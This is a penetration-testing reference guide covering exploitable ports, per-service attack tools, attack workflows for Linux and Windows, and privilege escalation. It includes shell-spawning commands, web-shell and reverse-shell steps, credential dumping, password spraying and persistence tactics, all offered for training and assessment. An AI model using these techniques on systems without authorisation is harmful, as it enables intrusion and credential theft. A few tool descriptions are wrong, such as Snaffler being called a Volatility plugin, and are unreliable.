Penetration Testing Reference Guide

Penetration Testing Reference Guide

Glossary
- Burp Suite
- Crowbar
- Dirb
- FFUF
- Gobuster
- Hydra
- John the Ripper
- LinPEAS
- Medusa
- Metasploit
- Mimikatz
- Ncrack
- Nikto
- Nmap
- OWASP ZAP
- PowerUp
- Seatbelt
- Socat
- Telnet
- WinPEAS
- WPScan
- Xfreerdp / Rdesktop (RDP Clients)
- ldapsearch
- mongo (MongoDB Client)
- onesixtyone
- PowerView / SharpView
- SharpHound
- BloodHound.py
- Kerbrute
- Impacket Toolkit
- Responder
- Inveigh / InveighZero
- rpcinfo / rpcclient
- CrackMapExec (CME)
- NetExec
- Rubeus
- GetUserSPNs.py
- Hashcat
- enum4linux
- enum4linux‑ng
- windapsearch
- DomainPasswordSpray.ps1
- LAPSToolkit
- smbmap
- evil‑winrm
- Snaffler
- smbserver.py
- setspn.exe
- PetitPotam.py
- noPac.py
- adidnsdump
- gpp‑decrypt
- ADExplorer (ADExplorer.exe)
- PingCastle
- Group3r
- ADRecon
- Proxychains
- Chisel
- SMBClient

Commonly Exploitable Ports and Services

Open ports indicate network services that might be entry points for attackers (5 Essential Penetration Testing Phases You Can’t Ignore in 2025). Penetration testers focus on these commonly exploited services, which differ slightly between Linux and Windows environments. Below are well-known services, their default ports, and notes on why they are high-value targets:

Linux (Common Ports & Services)

22 (SSH) – Secure Shell for remote admin access. Often targeted via brute-force credential guessing or stolen SSH keys (Identifying secure and unsecured ports and how to secure them - All About Security). Modern SSH versions are robust, but weak passwords or outdated versions can be exploited.
21 (FTP) – File Transfer Protocol. Supports clear-text authentication; attackers may try anonymous login or brute-force credentials (Identifying secure and unsecured ports and how to secure them - All About Security). Misconfigured FTP servers can allow unauthorized file uploads or downloads.
23 (Telnet) – Unencrypted remote login (mostly replaced by SSH). Transmits data in plain text, making it susceptible to credential interception (Identifying secure and unsecured ports and how to secure them - All About Security). If enabled, it’s vulnerable to brute-force attacks and should be disabled on modern systems.
25 (SMTP) – Simple Mail Transfer Protocol for email. Not typically yielding remote shell access, but an open SMTP may allow spam relay or user enumeration via VRFY/EXPN commands. Weak configuration can be abused for phishing or as a pivot for social engineering.
53 (DNS) – Domain Name System. UDP/TCP port for name resolution and zone transfers. Generally not a direct path to shell, but DNS cache poisoning or misconfigured zone transfers can leak internal network info. Also known to be abused in amplification DDoS attacks (Identifying secure and unsecured ports and how to secure them - All About Security).
80/443 (HTTP/HTTPS) – Web services. Extremely common attack surface since web apps often contain vulnerabilities (SQL injection, XSS, file inclusion, etc.) (Identifying secure and unsecured ports and how to secure them - All About Security). Insecure web applications (e.g. outdated CMS or frameworks) on these ports can lead to full server compromise.
3306 (MySQL) – MySQL database service. If exposed with default or weak credentials, attackers can gain database access (Identifying secure and unsecured ports and how to secure them - All About Security). A compromised MySQL can allow reading sensitive data or even executing commands via functions or UDF exploits.
2049 (NFS) – Network File System for Unix file sharing. Misconfigured NFS exports (e.g. world-readable or no root squash) can let attackers mount file shares and read/write sensitive files. This can lead to privilege escalation if system files are accessible.
161/162 (SNMP) – Simple Network Management Protocol (UDP). Often left with default community string “public,” allowing read access to system info. Attackers use SNMP to gather network device info or even change configurations if write access is enabled.

Windows (Common Ports & Services)

139/445 (SMB/CIFS) – SMB file sharing and Windows domain services. Open by default on Windows and highly exploited (How to detect and prevent a TCP 445 exploit and attack using firewall log analysis). SMBv1 vulnerabilities like EternalBlue (MS17-010) allow remote code execution (Identifying secure and unsecured ports and how to secure them - All About Security), which was infamously used by WannaCry ransomware in 2017 (How to detect and prevent a TCP 445 exploit and attack using firewall log analysis). Attackers also use SMB for tactics like NTLM hash capture (e.g. via SMB relay) and anonymous share access.
3389 (RDP) – Remote Desktop Protocol for GUI access. Exposed RDP is often attacked via brute-force password guessing (What Are Risky Ports?) or exploitation of RDP vulnerabilities (e.g. BlueKeep CVE-2019-0708 is a wormable RDP bug). An RDP service with weak or leaked credentials can quickly lead to full desktop control (Identifying secure and unsecured ports and how to secure them - All About Security).
5985/5986 (WinRM) – Windows Remote Management (HTTP/S). Allows PowerShell remoting. If an attacker obtains valid user credentials (or hashes), they can use WinRM to execute commands remotely (often used in lateral movement). Should be open only on trusted networks.
1433 (MSSQL) – Microsoft SQL Server. Databases on this port are targeted if exposed. Attackers often try default sa credentials or exploit SQL Server misconfigurations to execute commands (xp_cmdshell) under the context of the DB service. Unprotected database ports are frequently probed to exploit them (Identifying secure and unsecured ports and how to secure them - All About Security).
389/636 (LDAP/LDAPS) – Directory services (used by Active Directory). LDAP itself may allow enumeration of users and network structure if anonymous or weakly authenticated binds are allowed. While not typically exploited for remote code execution, information from LDAP can be leveraged for attacks like password spraying or privilege escalation in a domain.
135 (RPC) – Microsoft RPC Endpoint Mapper. Used to negotiate DCE/RPC communications (e.g. DCOM, WMI). Historically associated with vulnerabilities like MS08-067 (Conficker) which exploited the RPC service on Windows XP/2003. Modern Windows RPC issues are less common, but the service is essential for many Windows functions and often a pivot for attacks (e.g. lateral movement using WMI).
53 (DNS) – Windows DNS Server if running. Like on Linux, an insecurely configured DNS on a domain controller could allow zone transfers, leaking internal records. Also, past RCE vulnerabilities in Microsoft DNS (e.g. SIGRed CVE-2020-1350) make this a notable port on Windows servers.

(Both Linux and Windows may run additional services; the above are those frequently seen in penetration testing engagements. Ensuring these services are patched, properly configured, and firewalled is crucial to securing a system.)

Toolset for Exploiting Each Service

Open‑source tools are the backbone of a pentester’s arsenal, from initial enumeration through post‑exploitation. Below is an extensive reference, organized by service type and common ports—perfect for OSCP or any hands‑on lab. If you spot an open port, consult its section for tools you can drop right into your workflow.

Active Directory Enumeration & Attacks

PowerView / SharpView – PowerShell modules for AD situational awareness (users, computers, ACLs).
SharpHound / BloodHound.py – Collect and visualize AD trust relationships and attack paths.
Kerbrute – Fast Kerberos user enumeration and password spraying.
GetUserSPNs.py (Impacket) – Enumerate SPNs to steal service tickets for Kerberoasting.
Rubeus – C# tool for Kerberos abuse (ticket theft, over‑pass‑the‑hash, Silver/Purple ticket ops).
Responder / Inveigh / InveighZero – LLMNR/NBNS/mDNS poisoners to capture NTLM hashes.
rpcinfo / rpcclient – Enumerate RPC endpoints and query Windows RPC services.
CrackMapExec (CME) / NetExec – Automate SMB/WinRM enumeration and credential validation across hosts.
Impacket Toolkit – Scripts like lookupsids.py, samrdump.py, psexec.py, wmiexec.py for RID brute‑forcing, SAM dumping, remote code exec.
DomainPasswordSpray.ps1 – PowerShell script for safe password spraying against AD.
LAPSToolkit – Extract or reset Local Administrator Password Solution managed passwords.
smbmap / smbserver.py – Share enumeration and rogue share hosting.
evil‑winrm – Fast WinRM shell for post‑exploit interaction.
PetitPotam.py / noPac.py – Abuses for forcing authentication to NTLM relay targets.
adidnsdump / windapsearch – Dump DNS/LDAP records from AD.
gpp‑decrypt – Decrypt passwords stored in Group Policy Preferences XML.
setspn.exe – Microsoft tool to view or alter service principal names.
ADExplorer (GUI) – Offline viewer for AD objects and attributes.
PingCastle / ADRecon / Group3r – Automated AD security assessment and reporting.

FTP (Port 21)

Nmap (ftp-anon, ftp-vsftpd-backdoor) – Anonymous login & vuln checks.
Hydra / Medusa / Ncrack – High‑speed FTP brute‑force.
Crowbar – Parallel credential cracking across services.
Metasploit (auxiliary/scanner/ftp/ftp_login) – FTP login automation.
socat – Manual protocol testing and port forwarding.

SSH (Port 22)

Nmap (-sV --script ssh2-enum-algos) – Service/version detection & cipher enumeration.
Hydra / Medusa / Ncrack – High‑speed username/password brute‑forcers.
ssh‑audit – Audit SSH server configuration (ciphers, MACs, key exchange).
Crowbar – Parallel credential brute‑forcing (supports SSH among others).
Metasploit (auxiliary/scanner/ssh/ssh_login) – Automate brute‑forcing or exploit specific SSH flaws.
John the Ripper / Hashcat – Crack passphrase‑protected private keys or captured /etc/shadow hashes.
SSH client / Banner grabbing – ssh, netcat, or bannergrab.sh to grab and analyze SSH banners.

Telnet (Port 23)

Telnet client – Basic connectivity & banner grabs.
Hydra / Medusa / Ncrack – Telnet credential brute‑forcing.
Metasploit (auxiliary/scanner/telnet/telnet_login) – Login scanner.
socat – Manual session injection & tunneling.

SMTP (Port 25)

Nmap (smtp-commands, smtp-open-relay) – Enumerate VRFY/EXPN & open relay.
Hydra / Medusa – SMTP AUTH brute‑force.
Metasploit (auxiliary/scanner/smtp/smtp_enum, smtp_login) – User enumeration & login.
socat – Manual SMTP handshakes for VRFY/EXPN.

DNS (Port 53)

Nmap (dns-recursion, dns-zone-transfer) – Zone transfer & recursion checks.
dig / host – Interactive DNS queries.
dnsenum / Fierce – Zone and subdomain enumeration.
socat – Craft raw DNS queries for testing.

HTTP/HTTPS (Ports 80 & 443)

Nmap (http-title, http-server-header, http-vuln-*) – Initial web fingerprinting & vuln scans.
WhatWeb / Wappalyzer – Technology and CMS detection.
FFUF / Gobuster / Dirb – Content discovery via wordlists.
Nikto – Web server misconfiguration & vuln scanner.
Burp Suite – Proxy, Intruder, Repeater, Scanner for manual & automated attacks.
OWASP ZAP – Free alternative for automated scanning & proxy testing.
SQLMap – Automated SQL injection & DB takeover.
WPScan – WordPress enumeration (plugins, themes, users) & brute‑force.

MySQL (Port 3306)

Nmap (mysql-info, mysql-empty-password) – Version & default credential checks.
Hydra / Medusa – MySQL login brute‑force.
SQLMap – Direct DB exploitation & file writes.
mysql client / mysqlenum – Manual queries, version pulls & privilege checks.

NFS (Port 2049)

Nmap (nfs-showmount) – Enumerate NFS exports.
showmount / mount.nfs – Export listing & mounting.
Metasploit (auxiliary/scanner/misc/nfs_mountd) – Automated NFS checks.

SNMP (Ports 161 & 162)

snmpwalk – Dump SNMP data using default/public community.
onesixtyone – Community‑string brute‑forcing.
Nmap (snmp-info) – Version & basic info enumeration.
Hydra – SNMP authentication cracking.

SMB / Windows Services (Ports 139 & 445)

Nmap (smb-enum-shares, smb-enum-users, smb-vuln*) – Share, user, and vuln enumeration.
Enum4linux / enum4linux‑ng – SMB/RPC information gathering.
SMBMap – Share access rights & writeable locations.
CrackMapExec (CME) / NetExec – Lateral movement, hash harvest, command execution.
Impacket (smbclient.py, secretsdump.py, psexec.py, wmiexec.py) – Remote commands & hash dumping.
Responder / Inveigh – Poison LLMNR/NBNS to capture NTLM creds.
PowerUp – Windows privilege escalation checks.
Seatbelt / WinPEAS / LinPEAS – Deep post‑exploit enumeration.
Mimikatz – Memory credential & ticket harvesting.
Snaffler – Volatility plugin to extract Windows artifacts from memory.

RDP (Port 3389)

Nmap (rdp-enum-encryption, rdp-vuln-ms12-020) – Check NLA & legacy vulns.
Hydra / Ncrack – RDP brute‑force.
Crowbar – Alternative RDP credential cracking.
Metasploit (exploit/windows/rdp/cve_2019_0708_bluekeep) – BlueKeep RCE.
xfreerdp / rdesktop – GUI sessions once creds are obtained.

WinRM (Ports 5985 & 5986)

CrackMapExec – Remote command exec via WinRM.
evil‑winrm – Interactive PowerShell remoting shell.
PowerShell Invoke‑Command / Enter‑PSSession – Native remoting.
Metasploit (auxiliary/scanner/winrm/*) – WinRM enumeration & exec.

MSSQL (Port 1433)

Nmap (ms-sql-info, ms-sql-empty-password) – Version & default SA checks.
Hydra / Medusa – MSSQL login brute‑force.
SQLMap – TDS protocol exploitation.
osql / sqlcmd – Microsoft CLI clients for manual queries.
Impacket mssqlclient.py – Integrated Windows auth & command execution.
Metasploit (auxiliary/admin/mssql/*) – SQL Server post‑exploit.

LDAP/LDAPS (Ports 389 & 636)

ldapsearch – Anonymous or credentialed bind queries.
enum4linux – LDAP over SMB/RPC enumeration.
Nmap (ldap-search) – Lightweight directory checks.
Impacket (GetADUsers.py, samrdump.py) – AD dumps via LDAP/SAMR.

RPC (Port 135)

rpcinfo / rpcclient – RPC service enumeration.
Nmap (msrpc-enum) – DCE/RPC endpoint discovery.
Impacket (dcomexec.py) – DCOM code execution.
Metasploit (auxiliary/scanner/portscan/rpc) – Automated RPC scanning.
CrackMapExec – Lateral movement leveraging RPC (WMI, DCOM).

(With this organized reference, simply jump to the section matching the open port or service you encounter, and you’ll have a toolkit at your fingertips for enumeration, exploitation, and post‑exploitation.)

Pentesting Workflow

A structured penetration testing workflow ensures no step is overlooked – from initial reconnaissance through exploitation and post-exploitation. Formal methodologies break the process into phases such as reconnaissance, scanning, enumeration, exploitation, and reporting (5 Essential Penetration Testing Phases You Can’t Ignore in 2025). In practice, these phases overlap, and testers iterate as new information is found. Below, we outline typical workflows for targeting Linux and Windows systems, highlighting how enumeration informs the exploitation strategy (for example, a web server vs. an SMB service will lead down different exploit paths). Importantly, thorough enumeration is critical – attempting exploits too early can be a mistake (5 Essential Penetration Testing Phases You Can’t Ignore in 2025) if you haven’t uncovered weak points. The workflows are:

Workflow for Targeting Linux Systems

Initial Reconnaissance & Scanning – Gather information about the target network or host. Use tools like Nmap for port scanning to identify open ports/services on the Linux host (e.g., SSH, HTTP, FTP, etc.). For example, if port 80 is open, note that we have a web service; if 2049 is open, an NFS service is present. Also perform service version detection (-sV) to find software versions (Apache, OpenSSH, etc.) which might have known vulnerabilities.
Service Enumeration – For each open port, perform targeted enumeration:
- If a web service (80/443) is found, browse the site and use tools like Gobuster/FFUF to find hidden paths, and WhatWeb/Wappalyzer to identify technologies. You might discover, say, a WordPress site (suggesting the use of WPScan next) or an out-of-date Apache server banner.
- If SSH (22) is open, attempt to grab the SSH version (ssh -v or Nmap script). A legacy SSH version could hint at known flaws, though those are rare. More likely, you’ll consider brute-force or public key attacks if credentials can be obtained.
- If an FTP server (21) allows anonymous login, enumerate accessible files (they might contain credentials or secrets). If it requires login, test common creds or use Hydra if appropriate and account lockout isn’t a concern.
- For database ports (e.g., MySQL 3306), try default creds and perform basic SQL queries if possible (or use a tool like mysqlenum).
- Enumerate any RPC or NFS services (showmount for NFS to list exports, rpcinfo for RPC services).
- Essentially, at this stage gather as much info as possible: user lists, share names, software versions, configuration details. This enumeration directly informs the next step.
Vulnerability Analysis – Map the enumeration results to known vulnerabilities or weaknesses. This is where experience and research come in:
- Check software versions against exploit databases (for instance, if Nmap found vsftpd 2.3.4 on FTP, that version has a known backdoor exploit; if Apache Tomcat is running, does it have default credentials on the manager interface?).
- Identify misconfigurations: e.g., an NFS share exportable to everyone with no root squash (potential to create SUID binaries to escalate later), or a web upload functionality that might allow malicious files.
- Use search engines and databases (Exploit-DB, CVE lists) to find exploits for identified software. Tools like Searchsploit (built into Kali) can be used: e.g., searchsploit proftpd 1.3.5 if that FTP version was found.
- Prioritize vulnerabilities by ease and impact. For example, an open phpMyAdmin portal with default creds is a quick win for full DB access, whereas an obscure buffer overflow in a service might require more effort.
- Also assess passwords found or brute-forced in enumeration. A reused or weak password (for SSH, FTP, etc.) can be a direct path in.
Exploitation – Now attempt to exploit the identified weaknesses to gain a foothold on the system. The approach will differ based on what you found:
- Web Exploitation: If the website has an apparent vulnerability (say, an SQL injection in a login form or a known exploit in an outdated WordPress plugin), use that to dump data or get a shell. For instance, an SQL injection might allow reading /etc/passwd or writing a webshell file. If a file upload is allowed (and not properly secured), upload a PHP reverse shell and execute it by visiting the file to spawn a shell on the server.
- Service Exploitation: Launch exploits against services with known flaws. If an older OpenSSH was found vulnerable to a specific CVE, use the exploit (or Metasploit module) for that CVE. If an FTP service allows file upload to the web directory, leverage that (as was done in some CTF-like scenarios such as uploading PHP through FTP and then triggering it via web).
- Password Reuse / Credential Login: Use any cracked or guessed credentials to log into services. For example, if you cracked an SSH password or found credentials in a config file during enumeration, attempt SSH login to gain a shell.
- Leverage Trust Relationships: Sometimes exploitation on Linux is about abusing trust – e.g., if there’s NFS with no_root_squash, you could create a setuid root shell on the NFS share and execute it on the target to become root (which is a form of exploitation/post-exploitation combined).
- It’s common to use Metasploit at this stage for reliability. For instance, to exploit a Linux Samba service (SMB on Linux) that’s vulnerable to SambaCry (CVE-2017-7494), or to exploit a Linux kernel vulnerability via a Metasploit local exploit module once you have user access. Always double-check exploit settings (RHOST, LHOST, payload, etc.) and have a stable listener (e.g., using netcat or Metasploit’s multi/handler) ready to catch shells.
Post-Exploitation & Privilege Escalation – After initial access (typically as a normal user on the Linux system), enumerate the system internals. Run hostname, id, and gather system info. Then proceed to privilege escalation (detailed in a later section) to gain root access. On Linux, this might involve checking for vulnerable kernel version, misconfigured sudo, or readable sensitive files like SSH private keys. Tools like linpeas.sh can automate this enumeration. For example, if you find that the target is running an outdated kernel with a known local exploit, you can compile and run that exploit to become root. Or if you discover a cron job running as root that executes a script in a world-writable directory, you can plant malicious code there (this is an exploitation of misconfiguration).
- Additionally, secure a foothold: consider installing a persistent backdoor or creating a new user with a known password for later access (in a real engagement, this step is taken with caution and normally removed in cleanup). In a CTF scenario, this might not be necessary; in a red-team, establishing persistence is key.
- Begin lateral movement if required: use the compromised machine to pivot deeper into the network. For instance, if this Linux host was a web server in a DMZ, from it you might port-forward or pivot to reach an internal database server not directly accessible before.

(Throughout the process, maintain good notes. Each finding from enumeration should trace to an exploit attempt. If something doesn’t work, revisit the enumeration—perhaps there was a subtle clue missed. For Linux targets, always remember to try simple things too, like default credentials or common passwords, as these often yield results even on “hardened” systems.)

Workflow for Targeting Windows Systems

Initial Reconnaissance & Scanning – Use Nmap or other scanners to identify Windows hosts and open ports. Windows machines can often be recognized by ports like 445/139 (SMB), 3389 (RDP), 135 (RPC). Service detection will show if it’s running Windows RPC, Microsoft IIS (web server), MS SQL, etc. Note the hostnames if obtained (e.g., through NetBIOS or reverse DNS lookup), as they might indicate the role of the server (e.g., a host named DC01 is likely a domain controller, which will guide your approach differently than a standalone server).
Service Enumeration – Enumerate each service in depth, leveraging Windows-specific enumeration tools:
- SMB/NetBIOS: Try to gather as much info as possible from SMB. Use null session if permitted (e.g., smbclient -L //target/ip -N to list shares anonymously). Use tools like Enum4linux or CrackMapExec to list users, shares, and policies (SMB Enumeration Cheatsheet - 0xdf hacks stuff). For domain environments, use rpcclient or specialized scripts to enumerate domain info (users, groups). Also, check SMB signing requirement (lack of signing can enable relay attacks, though that’s a more advanced technique).
- Active Directory: If the target is in a domain and you have a foothold or credentials, use AD enumeration tools (e.g., ldapsearch, PowerView, or BloodHound data collection via Sharphound) to map the domain. Even without creds, some AD info might be gleaned via LDAP if anonymous binds are allowed (rare on modern configs). At this stage, also note domain security features: is LAPS in use (unique local admin passwords) or older vulnerabilities like password in GPP (Group Policy Preferences) present? Such observations come from enumeration.
- RDP: Check if Network Level Authentication (NLA) is required (Nmap’s rdp-enum-encryption can tell you). If NLA is off and you have a credential, you might attempt an RDP login. If no credential, note RDP for potential brute force or as a target for exploits like BlueKeep. Also consider safe brute-force via Hydra/Medusa if policy allows (but many RDP services lock accounts or have few attempts allowed).
- Web (IIS): If the Windows host has a web service (IIS on port 80/443), enumerate it like any web app (using Burp, Nikto, etc.). Check for ASP.NET applications, older ASP pages, or default IIS pages. Known issues might include outdated ASP.NET frameworks (leading to deserialization attacks) or misconfigured web.config files leaking info.
- Database Services: For MSSQL (1433), attempt to connect using a SQL client or Nmap scripts. Default SA with no password was common on old setups. If you have Windows credentials from another source, try them for SQL authentication as well (sometimes Windows domain creds double as SQL login via integrated auth).
- WinRM/PowerShell: If 5985 is open (WinRM), and if you discover any user credentials, you can use them with Evil-WinRM or Enter-PSSession (PowerShell) to get a shell. At this stage, you’re just noting that WinRM is open and viable if creds are obtained.
- SNMP: On Windows, SNMP can reveal usernames, running software, etc. Use snmpwalk if SNMP is open. Similarly, enumerate RPC (using rpcclient or srvinfo commands) to get OS version, etc.
- In summary, compile a profile of the target: OS version (e.g., Windows Server 2012 R2?), patch level if determinable (SMB banner or vuln scan might hint if, say, MS17-010 patch is missing), users/accounts (through SMB enum or SNMP), and any obvious weak points (like share “Everyone:C” with full access, or an Outdated IIS version).
Vulnerability Analysis – Translate the enumeration data into potential exploits:
- Missing Patches: Determine if the Windows host is likely missing critical patches. For example, if a target is Windows 7 and SMBv1 is enabled (and perhaps an Nmap script indicates MS17-010 vulnerability), that’s a big target (Identifying secure and unsecured ports and how to secure them - All About Security). Tools like Nessus or OpenVAS (if allowed in scope) can help identify missing patches. Absent that, manual analysis and use of Nmap vuln scripts or Metasploit’s smb checker can confirm if an exploit like EternalBlue is applicable.
- Weak Credentials: Use any user list from SMB or AD to attempt password spraying (trying common passwords across many accounts) or brute-force specific accounts. For example, try Administrator:Admin@123 or season/year combos for any discovered usernames. Credentials are a frequent win on Windows networks, especially if account lockout policies are lenient or not all accounts are protected. If one account’s credentials are compromised, assess what access that account has (standard user? domain admin?).
- Public Exploits: Consider known exploit paths for Windows services:
  - SMB exploits like EternalBlue (for OS versions <= Win7/2008) or EternalRomance (for older Win2003) if unpatched.
  - RDP exploit (BlueKeep) if targeting an unpatched Win7/2008 RDP without NLA.
  - IIS exploits depending on version (old IIS 6.0 had a WebDAV exploit CVE-2017-7269, for instance).
  - If a web app is on the server (SharePoint, Outlook Web Access, etc.), check those for known CVEs.
- Configuration Flaws: Look for things like default credentials on services (e.g., an admin panel running on an odd port with default creds, or a service using default password “admin/admin”). On Windows, also consider if the SMB shares reveal sensitive info: e.g., a share “Backups” might contain backup files of the registry or SAM that could be used to extract credentials.
- Plan out which attack to attempt first based on likelihood of success and stealth. Often, exploiting a vulnerability like EternalBlue is very effective (and was widely used by attackers – e.g., 91.8% of attacks on port 445 have attempted EternalBlue in some studies (Majority of attacks against SMB protocol attempt to exploit EternalBlue)). However, in a hardened environment, that exploit might be patched, so you have alternate plans like password attacks or web exploits.
Exploitation – Execute the exploits or attacks to gain access:
- SMB Exploit Example: You decide to run the EternalBlue exploit on a vulnerable SMB service. Using Metasploit, configure the exploit/windows/smb/ms17_010_eternalblue module with the target IP and appropriate payload (often a Meterpreter reverse shell). When launched, if the target is indeed unpatched and vulnerable, you’ll get a SYSTEM shell on the machine. (If this fails, you might try a different payload or check if the target might have some IDS/IPS blocking the attempt.)
- Credential-Based: Suppose enumeration yielded a valid user credential (e.g., through password spraying you found User:Spring2023! works). You could use that credential to SMB into a share (net use \\target\C$) if the user is a local admin, or more commonly to WinRM into the host (using Evil-WinRM tool) which gives a PowerShell session as that user. From there, you are “in” and can proceed with post-exploitation. Another path: use those creds with psexec.py (Impacket) or Metasploit’s psexec module to get a shell.
- Web Shells / IIS: If exploiting a web vulnerability (say, file upload on an IIS web app), you might upload an ASPX webshell. Navigating to that webshell in a browser gives command execution on the server as the IIS user (often Network Service or SYSTEM for older IIS). For instance, a common technique is exploiting an insecure file upload function to drop an ASPX webshell (cmd.aspx) and then using it to run commands.
- Client-Side/Luring Attacks: In some cases, direct server exploits might fail, so consider luring a logged-in admin to execute something (social engineering). For example, using Responder to trick a machine on the network into sending you a hash, then cracking that hash. This strays into red-team tactics, but it’s part of the toolkit if pure exploitation of services doesn’t yield results on hardened systems.
- Regardless of method, once exploitation is successful, execute a payload that gives you remote control. A Meterpreter session from Metasploit is very powerful for Windows post-exploitation, or a reverse PowerShell or CMD shell will do for manual work. Ensure you have a stable connection (maybe set up multiple backdoors in case one dies).
Post-Exploitation & Privilege Escalation – On Windows, after gaining an initial foothold (likely as a low-privileged user or even SYSTEM on one machine), focus on escalating privileges and expanding access:
- If your shell is not already NT AUTHORITY\SYSTEM, attempt to escalate to that. This might involve using tools like Windows Privilege Escalation Awesome Script (WinPEAS) to enumerate possible weaknesses (unquoted service paths, vulnerable drivers, accessible registry keys, etc.). Common techniques include exploiting services running with SYSTEM privileges that have misconfigurations (detailed in the Privilege Escalation section below). For example, if you find a service with an unquoted path running as SYSTEM, and you can write to one of the path directories, you can place an executable there to hijack the service on next start (Privilege Escalation on Windows (With Examples)).
- Credential Dumping: Windows post-exploitation heavily involves dumping credentials. Use Mimikatz or Impacket’s secretsdump.py to dump hashes from memory or the SAM database. If you have local admin rights, you can pull all user password hashes and crack them offline or pass-the-hash to other systems. Mimikatz can also extract plain-text passwords from memory (for logged-in users or service accounts) if WDigest or other credentials are present. For instance, obtaining a domain admin’s hash or password from one compromised server is the crown jewel for AD environments.
- Lateral Movement: With some creds or hashes in hand, pivot to other machines. Use CrackMapExec or Metasploit’s psexec with the new credentials across the network to find where you can move next. If the initial host was not your final target, use the current foothold to scan the internal network (run PowerShell cmdlets or secondary Nmap scans from that host if allowed) for new targets.
- Persistence: Ensure you can get back in if needed. For example, add a new local user to the Remote Desktop Users group, or set up a scheduled task that opens a reverse shell every hour (in case your current session is lost). In an engagement, you’d document and remove these at the end, but during the test, it secures your access.
- Throughout post-exploitation, maintain operational security: use built-in Windows tools as much as possible (LOLBAS tactics) to avoid detection. For example, use net user to create accounts, schtasks for scheduling, etc., rather than uploading large binaries that may trigger antivirus.
- Begin data exfiltration or objective completion steps. If the goal is to access specific data, locate it (maybe using dir /s *financial* to search files, or using PowerShell to search for documents). If the goal is domain admin, continue lateral movement and privilege escalation until that’s achieved (for instance, performing Kerberoasting – requesting service tickets to crack — if you have a domain user account, to eventually crack a high-privilege service account password).

(The key in Windows environments is often to leverage the trust and inter-connectivity of systems: one low-privileged foothold can snowball through reused passwords, accessible shares, and domain trust to compromise the entire domain. The workflow is not strictly linear; you might pivot and escalate in tandem. Always revisit earlier steps if new information emerges — e.g., a config file found post-exploitation might contain credentials that send you back to step 2 for a different service. By following a structured approach, you reduce the chance of missing an obvious path to compromise.)

Note: At each stage for both Linux and Windows, document findings and maintain good operational security. Clean up any test accounts or shells after the engagement. A common pitfall is rushing to exploit without fully enumerating – experienced testers know to be methodical, since a missed vector could be the easiest way in, and exploiting without recon can alert defenders needlessly (5 Essential Penetration Testing Phases You Can’t Ignore in 2025).

Privilege Escalation Techniques (Post-Exploitation)

Gaining an initial foothold on a system is often just the first step; testers then attempt to elevate privileges to fully compromise the host (and potentially move laterally in the network). Privilege escalation is the process of going from a limited user account to higher privileges (root/Administrator or SYSTEM) (Linux Privilege Escalation: Techniques and Security Tips). Below we outline common privilege escalation methods on Linux and Windows systems, along with tools that assist in this phase:

Linux Privilege Escalation

On Linux, privilege escalation usually involves exploiting configuration weaknesses or vulnerabilities in software to go from a normal user to root (Linux Privilege Escalation: Techniques and Security Tips). Common techniques include:

Kernel Exploits – If the kernel is outdated, local exploits can be used to get root. For example, the infamous Dirty COW exploit (CVE-2016-5195) abused a race condition in the kernel’s memory management to gain write access to read-only files, leading to root access (Linux Privilege Escalation Guide (Updated for 2024)). Tools like searchsploit can help find local kernel exploits once you know the kernel version (uname -a). Running an exploit will typically spawn a root shell if successful. (Defenders should keep kernels updated; Dirty COW was patched in all major distros after 2016.)
SUID/SGID Executables – Files with the SUID bit run with elevated privileges. Attackers search for unusual SUID-root files (find / -perm -4000 -type f 2>/dev/null). If such a binary is outdated or poorly coded, it can be exploited. Even benign tools can be abused; for instance, if vim is SUID-root (rare, but as an example), one could run vim -c '!sh' to get a root shell. More commonly, custom SUID scripts or binaries with programming flaws (buffer overflows, etc.) are targets.
Misconfigured sudo – If the user is allowed to run certain commands as root via sudo (check sudo -l), that can often be leveraged. For example, if sudo allows running python or vim as root without a password, those can be used to spawn a root shell (this is documented in GTFOBins). Even if a command is restricted, sometimes wildcards or environment variables can be abused (e.g., sudoing a binary that can be tricked into running a shell, or exploiting sudoedit).
World-Writable Files or Sensitive Files – Attackers look for configuration files or scripts that are world-writable but executed by root. A common scenario is a cron job. For instance, if there’s a cron job running as root every minute executing a script in /etc/cron.d/backup.sh, and that script is editable by our low-priv user, one can insert malicious commands into it and wait for the cron to run to get root. Another example: a world-writable /etc/passwd or /etc/shadow (very bad practice) would allow adding a new root user or editing a root password hash.
Credential Reuse & Looting – Sometimes privilege escalation is achieved not by a software exploit but by finding credentials on the box. Linux users might have SSH keys in their home directories; an attacker who finds a private key in, say, /home/admin/.ssh/id_rsa could try it as root’s key or use it to log into other servers as that user. Also, configuration files (like database configs) may contain root DB passwords, which might be reused as system root password. Extracting hashes from /etc/shadow (if the user is in a group that can read it, or via a kernel exploit) and cracking them can yield the root password as well.
Exploiting Running Services – If the compromised user can interact with a service running as root on localhost, that can be a path. For example, if there’s a local MySQL service running as root and accessible without a password from localhost, the attacker (as a low user) could connect and use MySQL’s User Defined Functions to execute system commands as root.
Path Hijacking (Linux) – This is less common but if an admin scripted something poorly. For instance, if a root cron job runs a script that calls an external program without using an absolute path, and the attacker can place a malicious program in a directory that comes earlier in $PATH, they can hijack the call. E.g., a cron job runs ls but doesn’t specify full path; if the attacker puts a fake ls in /tmp and the cron’s PATH includes /tmp before /bin, the cron job might execute the attacker’s /tmp/ls (which could do anything as root).
Automated Enumeration Tools – Tools like LinPEAS and Linux Exploit Suggester automate the discovery of the above issues. LinPEAS will highlight suspicious SUID files, sudo privileges, world-writable cron jobs, accessible passwords, kernel versions with known exploits, and more, in color-coded output. LinEnum is another script that gathers similar information. These tools greatly speed up the process of privilege escalation analysis on Linux.

From a defensive standpoint, mitigating these issues involves regular patching (to prevent kernel exploits), principle of least privilege (don’t give users unnecessary sudo rights), careful configuration (no world-writable scripts in cron, minimal SUID binaries), and not leaving plaintext creds on disk. System administrators should also monitor for abnormal use of programs with SUID or sudo.

Windows Privilege Escalation

Windows privilege escalation can be vertical (from a local user to local admin/SYSTEM) or horizontal (from one user to another). Ultimately, attackers aim to reach Administrator or SYSTEM on the box, or even Domain Administrator in an Active Directory environment (Privilege Escalation on Windows (With Examples)). Common techniques include:

Insecure Service Permissions – Many Windows services run with SYSTEM privileges. If the file or registry settings for a service are improperly permissioned, a normal user might be able to modify them (Privilege Escalation on Windows (With Examples)). For example, if a service’s executable is located in C:\Program Files\SomeService\service.exe but the ACLs on that folder allow regular users to modify the .exe, an attacker can replace it with a malicious exe. Next time the service starts (or is restarted), it runs the attacker’s code as SYSTEM. Always check: sc qc ServiceName to see the binary path, then icacls on that path to see permissions.
